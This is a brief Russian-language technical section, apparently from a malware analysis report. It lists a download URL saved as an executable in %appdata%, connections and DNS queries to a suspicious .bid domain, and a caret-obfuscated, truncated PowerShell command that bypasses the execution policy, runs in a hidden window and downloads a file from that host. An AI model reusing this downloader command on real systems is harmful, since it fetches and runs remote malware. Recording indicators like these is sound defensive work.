Техническая информация
- http://asecwitlecn.bid/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POWe^r^s^Hell.eXe -^eXe^C^utio^n^PoLi^cy^ B^yPAs^S ^-N^Opr^O^F^IlE^ -wI^nD^OwsTyle^ H^i^d^DE^n (^NeW-^oBJe^c^t^ ^SY^Stem.NeT.wEBC^l^iEN^t).DOWnl^o^adFIle('http://asecwitlecn.bid...
- 'as###itlecn.bid':80
- http://as###itlecn.bid/read.php?f=#####
- DNS ASK as###itlecn.bid
- '<SYSTEM32>\cmd.exe' /c "POWe^r^s^Hell.eXe -^eXe^C^utio^n^PoLi^cy^ B^yPAs^S ^-N^Opr^O^F^IlE^ -wI^nD^OwsTyle^ H^i^d^DE^n (^NeW-^oBJe^c^t^ ^SY^Stem.NeT.wEBC^l^iEN^t).DOWnl^o^adFIle('http://asecwitlecn.bid...' (со скрытым окном)